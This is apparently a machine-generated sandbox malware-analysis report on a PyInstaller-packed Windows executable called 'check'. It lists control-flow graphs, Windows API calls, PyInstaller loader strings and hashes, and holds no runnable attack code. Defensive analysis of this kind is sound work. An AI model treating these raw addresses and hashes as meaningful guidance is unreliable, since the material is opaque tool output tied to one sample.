                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1D16A32A08A8686EB108F34E8542AE3764FF89B5CF608275DA5FC3AB4DF3CD5558700

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 62 7ff60b121000-7ff60b123806 call 7ff60b12fe18 call 7ff60b12fe20 call 7ff60b12c850 call 7ff60b1353f0 call 7ff60b135484 call 7ff60b1236b0 76 7ff60b123808-7ff60b12380f 62->76 77 7ff60b123814-7ff60b123836 call 7ff60b121950 62->77 78 7ff60b123c97-7ff60b123cb2 call 7ff60b12c550 76->78 83 7ff60b12391b-7ff60b123931 call 7ff60b1245c0 77->83 84 7ff60b12383c-7ff60b123856 call 7ff60b121c80 77->84 90 7ff60b12396a-7ff60b12397f call 7ff60b122710 83->90 91 7ff60b123933-7ff60b123960 call 7ff60b127f90 83->91 87 7ff60b12385b-7ff60b12389b call 7ff60b128830 84->87 95 7ff60b12389d-7ff60b1238a3 87->95 96 7ff60b1238c1-7ff60b1238cc call 7ff60b134f30 87->96 99 7ff60b123c8f 90->99 103 7ff60b123962-7ff60b123965 call 7ff60b13004c 91->103 104 7ff60b123984-7ff60b1239a6 call 7ff60b121c80 91->104 100 7ff60b1238af-7ff60b1238bd call 7ff60b1289a0 95->100 101 7ff60b1238a5-7ff60b1238ad 95->101 111 7ff60b1239fc-7ff60b123a2a call 7ff60b128940 call 7ff60b1289a0 * 3 96->111 112 7ff60b1238d2-7ff60b1238e1 call 7ff60b128830 96->112 99->78 100->96 101->100 103->90 113 7ff60b1239b0-7ff60b1239b9 104->113 138 7ff60b123a2f-7ff60b123a3e call 7ff60b128830 111->138 120 7ff60b1238e7-7ff60b1238ed 112->120 121 7ff60b1239f4-7ff60b1239f7 call 7ff60b134f30 112->121 113->113 116 7ff60b1239bb-7ff60b1239d8 call 7ff60b121950 113->116 116->87 130 7ff60b1239de-7ff60b1239ef call 7ff60b122710 116->130 126 7ff60b1238f0-7ff60b1238fc 120->126 121->111 127 7ff60b1238fe-7ff60b123903 126->127 128 7ff60b123905-7ff60b123908 126->128 127->126 127->128 128->121 131 7ff60b12390e-7ff60b123916 call 7ff60b134f30 128->131 130->99 131->138 141 7ff60b123b45-7ff60b123b53 138->141 142 7ff60b123a44-7ff60b123a47 138->142 143 7ff60b123a67 141->143 144 7ff60b123b59-7ff60b123b5d 141->144 142->141 145 7ff60b123a4d-7ff60b123a50 142->145 146 7ff60b123a6b-7ff60b123a90 call 7ff60b134f30 143->146 144->146 147 7ff60b123a56-7ff60b123a5a 145->147 148 7ff60b123b14-7ff60b123b17 145->148 157 7ff60b123aab-7ff60b123ac0 146->157 158 7ff60b123a92-7ff60b123aa6 call 7ff60b128940 146->158 147->148 149 7ff60b123a60 147->149 150 7ff60b123b19-7ff60b123b1d 148->150 151 7ff60b123b2f-7ff60b123b40 call 7ff60b122710 148->151 149->143 150->151 153 7ff60b123b1f-7ff60b123b2a 150->153 159 7ff60b123c7f-7ff60b123c87 151->159 153->146 161 7ff60b123ac6-7ff60b123aca 157->161 162 7ff60b123be8-7ff60b123bfa call 7ff60b128830 157->162 158->157 159->99 164 7ff60b123bcd-7ff60b123be2 call 7ff60b121940 161->164 165 7ff60b123ad0-7ff60b123ae8 call 7ff60b135250 161->165 170 7ff60b123bfc-7ff60b123c02 162->170 171 7ff60b123c2e 162->171 164->161 164->162 175 7ff60b123aea-7ff60b123b02 call 7ff60b135250 165->175 176 7ff60b123b62-7ff60b123b7a call 7ff60b135250 165->176 173 7ff60b123c1e-7ff60b123c2c 170->173 174 7ff60b123c04-7ff60b123c1c 170->174 177 7ff60b123c31-7ff60b123c40 call 7ff60b134f30 171->177 173->177 174->177 175->164 186 7ff60b123b08-7ff60b123b0f 175->186 184 7ff60b123b87-7ff60b123b9f call 7ff60b135250 176->184 185 7ff60b123b7c-7ff60b123b80 176->185 187 7ff60b123c46-7ff60b123c4a 177->187 188 7ff60b123d41-7ff60b123d63 call 7ff60b1244e0 177->188 199 7ff60b123bac-7ff60b123bc4 call 7ff60b135250 184->199 200 7ff60b123ba1-7ff60b123ba5 184->200 185->184 186->164 190 7ff60b123c50-7ff60b123c5f call 7ff60b1290e0 187->190 191 7ff60b123cd4-7ff60b123ce6 call 7ff60b128830 187->191 197 7ff60b123d71-7ff60b123d82 call 7ff60b121c80 188->197 198 7ff60b123d65-7ff60b123d6f call 7ff60b124630 188->198 208 7ff60b123c61 190->208 209 7ff60b123cb3-7ff60b123cb6 call 7ff60b128660 190->209 203 7ff60b123ce8-7ff60b123ceb 191->203 204 7ff60b123d35-7ff60b123d3c 191->204 213 7ff60b123d87-7ff60b123d96 197->213 198->213 199->164 221 7ff60b123bc6 199->221 200->199 203->204 211 7ff60b123ced-7ff60b123d10 call 7ff60b121c80 203->211 210 7ff60b123c68 call 7ff60b122710 204->210 208->210 220 7ff60b123cbb-7ff60b123cbd 209->220 222 7ff60b123c6d-7ff60b123c77 210->222 228 7ff60b123d2b-7ff60b123d33 call 7ff60b134f30 211->228 229 7ff60b123d12-7ff60b123d26 call 7ff60b122710 call 7ff60b134f30 211->229 218 7ff60b123d98-7ff60b123d9f 213->218 219 7ff60b123dc4-7ff60b123dda call 7ff60b129390 213->219 218->219 224 7ff60b123da1-7ff60b123da5 218->224 234 7ff60b123de8-7ff60b123e04 SetDllDirectoryW 219->234 235 7ff60b123ddc 219->235 226 7ff60b123cc8-7ff60b123ccf 220->226 227 7ff60b123cbf-7ff60b123cc6 220->227 221->164 222->159 224->219 230 7ff60b123da7-7ff60b123dbe SetDllDirectoryW LoadLibraryExW 224->230 226->213 227->210 228->213 229->222 230->219 238 7ff60b123e0a-7ff60b123e19 call 7ff60b128830 234->238 239 7ff60b123f01-7ff60b123f08 234->239 235->234 250 7ff60b123e1b-7ff60b123e21 238->250 251 7ff60b123e32-7ff60b123e3c call 7ff60b134f30 238->251 242 7ff60b124008-7ff60b124010 239->242 243 7ff60b123f0e-7ff60b123f15 239->243 247 7ff60b124012-7ff60b12402f PostMessageW GetMessageW 242->247 248 7ff60b124035-7ff60b124067 call 7ff60b1236a0 call 7ff60b123360 call 7ff60b123670 call 7ff60b126fc0 call 7ff60b126d70 242->248 243->242 246 7ff60b123f1b-7ff60b123f25 call 7ff60b1233c0 243->246 246->222 260 7ff60b123f2b-7ff60b123f3f call 7ff60b1290c0 246->260 247->248 254 7ff60b123e2d-7ff60b123e2f 250->254 255 7ff60b123e23-7ff60b123e2b 250->255 262 7ff60b123ef2-7ff60b123efc call 7ff60b128940 251->262 263 7ff60b123e42-7ff60b123e48 251->263 254->251 255->254 269 7ff60b123f41-7ff60b123f5e PostMessageW GetMessageW 260->269 270 7ff60b123f64-7ff60b123fa0 call 7ff60b128940 call 7ff60b1289e0 call 7ff60b126fc0 call 7ff60b126d70 call 7ff60b1288e0 260->270 262->239 263->262 268 7ff60b123e4e-7ff60b123e54 263->268 272 7ff60b123e56-7ff60b123e58 268->272 273 7ff60b123e5f-7ff60b123e61 268->273 269->270 308 7ff60b123fa5-7ff60b123fa7 270->308 276 7ff60b123e67-7ff60b123e83 call 7ff60b126dc0 call 7ff60b127340 272->276 277 7ff60b123e5a 272->277 273->239 273->276 289 7ff60b123e8e-7ff60b123e95 276->289 290 7ff60b123e85-7ff60b123e8c 276->290 277->239 293 7ff60b123e97-7ff60b123ea4 call 7ff60b126e00 289->293 294 7ff60b123eaf-7ff60b123eb9 call 7ff60b1271b0 289->294 292 7ff60b123edb-7ff60b123ef0 call 7ff60b122a50 call 7ff60b126fc0 call 7ff60b126d70 290->292 292->239 293->294 305 7ff60b123ea6-7ff60b123ead 293->305 306 7ff60b123ebb-7ff60b123ec2 294->306 307 7ff60b123ec4-7ff60b123ed2 call 7ff60b1274f0 294->307 305->292 306->292 307->239 319 7ff60b123ed4 307->319 311 7ff60b123fa9-7ff60b123fbf call 7ff60b128ed0 call 7ff60b1288e0 308->311 312 7ff60b123ff5-7ff60b124003 call 7ff60b121900 308->312 311->312 323 7ff60b123fc1-7ff60b123fd6 311->323 312->222 319->292 324 7ff60b123fd8-7ff60b123feb call 7ff60b122710 call 7ff60b121900 323->324 325 7ff60b123ff0 call 7ff60b122a50 323->325 324->222 325->312
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
                                                                                                                                                                                                                • API String ID: 2776309574-4232158417
                                                                                                                                                                                                                • Opcode ID: 2d77af2a2f9236e5f1bda1603447cca491bc739d444c9c91c5f96d0c69afedc5
                                                                                                                                                                                                                • Instruction ID: be65ab544959314bfaad0b304b823912db506a86f9e4606c85ed562c4079338d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d77af2a2f9236e5f1bda1603447cca491bc739d444c9c91c5f96d0c69afedc5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C329121A0C68295FB15DB24E4553B96651AF4E74CFA4C0B2DA5FC32F6EF2CE968C304

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 479 7ff60b145c00-7ff60b145c3b call 7ff60b145588 call 7ff60b145590 call 7ff60b1455f8 486 7ff60b145c41-7ff60b145c4c call 7ff60b145598 479->486 487 7ff60b145e65-7ff60b145eb1 call 7ff60b13a900 call 7ff60b145588 call 7ff60b145590 call 7ff60b1455f8 479->487 486->487 493 7ff60b145c52-7ff60b145c5c 486->493 513 7ff60b145eb7-7ff60b145ec2 call 7ff60b145598 487->513 514 7ff60b145fef-7ff60b14605d call 7ff60b13a900 call 7ff60b141578 487->514 495 7ff60b145c7e-7ff60b145c82 493->495 496 7ff60b145c5e-7ff60b145c61 493->496 497 7ff60b145c85-7ff60b145c8d 495->497 499 7ff60b145c64-7ff60b145c6f 496->499 497->497 502 7ff60b145c8f-7ff60b145ca2 call 7ff60b13d5fc 497->502 500 7ff60b145c7a-7ff60b145c7c 499->500 501 7ff60b145c71-7ff60b145c78 499->501 500->495 504 7ff60b145cab-7ff60b145cb9 500->504 501->499 501->500 509 7ff60b145cba-7ff60b145cc6 call 7ff60b13a948 502->509 510 7ff60b145ca4-7ff60b145ca6 call 7ff60b13a948 502->510 520 7ff60b145ccd-7ff60b145cd5 509->520 510->504 513->514 523 7ff60b145ec8-7ff60b145ed3 call 7ff60b1455c8 513->523 532 7ff60b14606b-7ff60b14606e 514->532 533 7ff60b14605f-7ff60b146066 514->533 520->520 524 7ff60b145cd7-7ff60b145ce8 call 7ff60b140474 520->524 523->514 534 7ff60b145ed9-7ff60b145efc call 7ff60b13a948 GetTimeZoneInformation 523->534 524->487 531 7ff60b145cee-7ff60b145d44 call 7ff60b14a4d0 * 4 call 7ff60b145b1c 524->531 591 7ff60b145d46-7ff60b145d4a 531->591 535 7ff60b146070 532->535 536 7ff60b1460a5-7ff60b1460b8 call 7ff60b13d5fc 532->536 539 7ff60b1460fb-7ff60b1460fe 533->539 547 7ff60b145fc4-7ff60b145fee call 7ff60b145580 call 7ff60b145570 call 7ff60b145578 534->547 548 7ff60b145f02-7ff60b145f23 534->548 540 7ff60b146073 535->540 557 7ff60b1460ba 536->557 558 7ff60b1460c3-7ff60b1460de call 7ff60b141578 536->558 539->540 544 7ff60b146104-7ff60b14610c call 7ff60b145c00 539->544 545 7ff60b146078-7ff60b1460a4 call 7ff60b13a948 call 7ff60b12c550 540->545 546 7ff60b146073 call 7ff60b145e7c 540->546 544->545 546->545 552 7ff60b145f2e-7ff60b145f35 548->552 553 7ff60b145f25-7ff60b145f2b 548->553 561 7ff60b145f49 552->561 562 7ff60b145f37-7ff60b145f3f 552->562 553->552 566 7ff60b1460bc-7ff60b1460c1 call 7ff60b13a948 557->566 574 7ff60b1460e0-7ff60b1460e3 558->574 575 7ff60b1460e5-7ff60b1460f7 call 7ff60b13a948 558->575 571 7ff60b145f4b-7ff60b145fbf call 7ff60b14a4d0 * 4 call 7ff60b142b5c call 7ff60b146114 * 2 561->571 562->561 568 7ff60b145f41-7ff60b145f47 562->568 566->535 568->571 571->547 574->566 575->539 593 7ff60b145d4c 591->593 594 7ff60b145d50-7ff60b145d54 591->594 593->594 594->591 596 7ff60b145d56-7ff60b145d7b call 7ff60b136b58 594->596 602 7ff60b145d7e-7ff60b145d82 596->602 604 7ff60b145d91-7ff60b145d95 602->604 605 7ff60b145d84-7ff60b145d8f 602->605 604->602 605->604 607 7ff60b145d97-7ff60b145d9b 605->607 610 7ff60b145d9d-7ff60b145dc5 call 7ff60b136b58 607->610 611 7ff60b145e1c-7ff60b145e20 607->611 619 7ff60b145dc7 610->619 620 7ff60b145de3-7ff60b145de7 610->620 612 7ff60b145e27-7ff60b145e34 611->612 613 7ff60b145e22-7ff60b145e24 611->613 615 7ff60b145e36-7ff60b145e4c call 7ff60b145b1c 612->615 616 7ff60b145e4f-7ff60b145e5e call 7ff60b145580 call 7ff60b145570 612->616 613->612 615->616 616->487 623 7ff60b145dca-7ff60b145dd1 619->623 620->611 625 7ff60b145de9-7ff60b145e07 call 7ff60b136b58 620->625 623->620 626 7ff60b145dd3-7ff60b145de1 623->626 631 7ff60b145e13-7ff60b145e1a 625->631 626->620 626->623 631->611 632 7ff60b145e09-7ff60b145e0d 631->632 632->611 633 7ff60b145e0f 632->633 633->631
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF60B145C45
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B145598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF60B1455AC
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B13A948: RtlFreeHeap.NTDLL(?,?,?,00007FF60B142D22,?,?,?,00007FF60B142D5F,?,?,00000000,00007FF60B143225,?,?,?,00007FF60B143157), ref: 00007FF60B13A95E
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B13A948: GetLastError.KERNEL32(?,?,?,00007FF60B142D22,?,?,?,00007FF60B142D5F,?,?,00000000,00007FF60B143225,?,?,?,00007FF60B143157), ref: 00007FF60B13A968
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B13A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF60B13A8DF,?,?,?,?,?,00007FF60B13A7CA), ref: 00007FF60B13A909
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B13A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF60B13A8DF,?,?,?,?,?,00007FF60B13A7CA), ref: 00007FF60B13A92E
                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF60B145C34
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B1455F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF60B14560C
                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF60B145EAA
                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF60B145EBB
                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF60B145ECC
                                                                                                                                                                                                                • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF60B14610C), ref: 00007FF60B145EF3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                • API String ID: 4070488512-239921721
                                                                                                                                                                                                                • Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                • Instruction ID: 29cda9c49e75ed969095e01d6fb4f13508032933266429072d0122898810180b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7D1BF32A1824286E7209F25D4511B96762FFADB9CF64C075EA4FC76A5EF3CE4418740

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 693 7ff60b146964-7ff60b1469d7 call 7ff60b146698 696 7ff60b1469d9-7ff60b1469e2 call 7ff60b134ee8 693->696 697 7ff60b1469f1-7ff60b1469fb call 7ff60b138520 693->697 702 7ff60b1469e5-7ff60b1469ec call 7ff60b134f08 696->702 703 7ff60b146a16-7ff60b146a7f CreateFileW 697->703 704 7ff60b1469fd-7ff60b146a14 call 7ff60b134ee8 call 7ff60b134f08 697->704 720 7ff60b146d32-7ff60b146d52 702->720 705 7ff60b146afc-7ff60b146b07 GetFileType 703->705 706 7ff60b146a81-7ff60b146a87 703->706 704->702 712 7ff60b146b09-7ff60b146b44 GetLastError call 7ff60b134e7c CloseHandle 705->712 713 7ff60b146b5a-7ff60b146b61 705->713 709 7ff60b146ac9-7ff60b146af7 GetLastError call 7ff60b134e7c 706->709 710 7ff60b146a89-7ff60b146a8d 706->710 709->702 710->709 718 7ff60b146a8f-7ff60b146ac7 CreateFileW 710->718 712->702 728 7ff60b146b4a-7ff60b146b55 call 7ff60b134f08 712->728 716 7ff60b146b69-7ff60b146b6c 713->716 717 7ff60b146b63-7ff60b146b67 713->717 723 7ff60b146b72-7ff60b146bc7 call 7ff60b138438 716->723 724 7ff60b146b6e 716->724 717->723 718->705 718->709 731 7ff60b146bc9-7ff60b146bd5 call 7ff60b1468a0 723->731 732 7ff60b146be6-7ff60b146c17 call 7ff60b146418 723->732 724->723 728->702 731->732 740 7ff60b146bd7 731->740 738 7ff60b146c19-7ff60b146c1b 732->738 739 7ff60b146c1d-7ff60b146c5f 732->739 741 7ff60b146bd9-7ff60b146be1 call 7ff60b13aac0 738->741 742 7ff60b146c81-7ff60b146c8c 739->742 743 7ff60b146c61-7ff60b146c65 739->743 740->741 741->720 745 7ff60b146d30 742->745 746 7ff60b146c92-7ff60b146c96 742->746 743->742 744 7ff60b146c67-7ff60b146c7c 743->744 744->742 745->720 746->745 748 7ff60b146c9c-7ff60b146ce1 CloseHandle CreateFileW 746->748 750 7ff60b146d16-7ff60b146d2b 748->750 751 7ff60b146ce3-7ff60b146d11 GetLastError call 7ff60b134e7c call 7ff60b138660 748->751 750->745 751->750
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1617910340-0
                                                                                                                                                                                                                • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                • Instruction ID: 5f24781cbd8615d070b26b926117507346cd883c58fdeaade27111641fc32d48
                                                                                                                                                                                                                • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8AC1BE32B28A4285EB10CFA9D4902AD3761EB4EBACB258275DA1FD77E4DF38D455C300

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(?,00007FF60B128919,00007FF60B123FA5), ref: 00007FF60B12842B
                                                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?,00007FF60B128919,00007FF60B123FA5), ref: 00007FF60B1284AE
                                                                                                                                                                                                                • DeleteFileW.KERNELBASE(?,00007FF60B128919,00007FF60B123FA5), ref: 00007FF60B1284CD
                                                                                                                                                                                                                • FindNextFileW.KERNELBASE(?,00007FF60B128919,00007FF60B123FA5), ref: 00007FF60B1284DB
                                                                                                                                                                                                                • FindClose.KERNEL32(?,00007FF60B128919,00007FF60B123FA5), ref: 00007FF60B1284EC
                                                                                                                                                                                                                • RemoveDirectoryW.KERNELBASE(?,00007FF60B128919,00007FF60B123FA5), ref: 00007FF60B1284F5
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                • String ID: %s\*
                                                                                                                                                                                                                • API String ID: 1057558799-766152087
                                                                                                                                                                                                                • Opcode ID: 7c12b01ff297979e1ecdf005a6213684df6049b407edb1b83f88227167b7eee2
                                                                                                                                                                                                                • Instruction ID: faed40340ae5f9690daefad358e443f48c1d242be8b403b84d5f07edbd105d57
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c12b01ff297979e1ecdf005a6213684df6049b407edb1b83f88227167b7eee2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C413221A0C582D5EE209F64E4442BA6360FF9E75CF648272D95FC26A4EF3CD955C740

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 1014 7ff60b145e7c-7ff60b145eb1 call 7ff60b145588 call 7ff60b145590 call 7ff60b1455f8 1021 7ff60b145eb7-7ff60b145ec2 call 7ff60b145598 1014->1021 1022 7ff60b145fef-7ff60b14605d call 7ff60b13a900 call 7ff60b141578 1014->1022 1021->1022 1028 7ff60b145ec8-7ff60b145ed3 call 7ff60b1455c8 1021->1028 1033 7ff60b14606b-7ff60b14606e 1022->1033 1034 7ff60b14605f-7ff60b146066 1022->1034 1028->1022 1035 7ff60b145ed9-7ff60b145efc call 7ff60b13a948 GetTimeZoneInformation 1028->1035 1036 7ff60b146070 1033->1036 1037 7ff60b1460a5-7ff60b1460b8 call 7ff60b13d5fc 1033->1037 1039 7ff60b1460fb-7ff60b1460fe 1034->1039 1046 7ff60b145fc4-7ff60b145fee call 7ff60b145580 call 7ff60b145570 call 7ff60b145578 1035->1046 1047 7ff60b145f02-7ff60b145f23 1035->1047 1040 7ff60b146073 1036->1040 1054 7ff60b1460ba 1037->1054 1055 7ff60b1460c3-7ff60b1460de call 7ff60b141578 1037->1055 1039->1040 1043 7ff60b146104-7ff60b14610c call 7ff60b145c00 1039->1043 1044 7ff60b146078-7ff60b1460a4 call 7ff60b13a948 call 7ff60b12c550 1040->1044 1045 7ff60b146073 call 7ff60b145e7c 1040->1045 1043->1044 1045->1044 1050 7ff60b145f2e-7ff60b145f35 1047->1050 1051 7ff60b145f25-7ff60b145f2b 1047->1051 1058 7ff60b145f49 1050->1058 1059 7ff60b145f37-7ff60b145f3f 1050->1059 1051->1050 1062 7ff60b1460bc-7ff60b1460c1 call 7ff60b13a948 1054->1062 1069 7ff60b1460e0-7ff60b1460e3 1055->1069 1070 7ff60b1460e5-7ff60b1460f7 call 7ff60b13a948 1055->1070 1066 7ff60b145f4b-7ff60b145fbf call 7ff60b14a4d0 * 4 call 7ff60b142b5c call 7ff60b146114 * 2 1058->1066 1059->1058 1064 7ff60b145f41-7ff60b145f47 1059->1064 1062->1036 1064->1066 1066->1046 1069->1062 1070->1039
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF60B145EAA
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B1455F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF60B14560C
                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF60B145EBB
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B145598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF60B1455AC
                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF60B145ECC
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B1455C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF60B1455DC
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B13A948: RtlFreeHeap.NTDLL(?,?,?,00007FF60B142D22,?,?,?,00007FF60B142D5F,?,?,00000000,00007FF60B143225,?,?,?,00007FF60B143157), ref: 00007FF60B13A95E
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B13A948: GetLastError.KERNEL32(?,?,?,00007FF60B142D22,?,?,?,00007FF60B142D5F,?,?,00000000,00007FF60B143225,?,?,?,00007FF60B143157), ref: 00007FF60B13A968
                                                                                                                                                                                                                • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF60B14610C), ref: 00007FF60B145EF3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
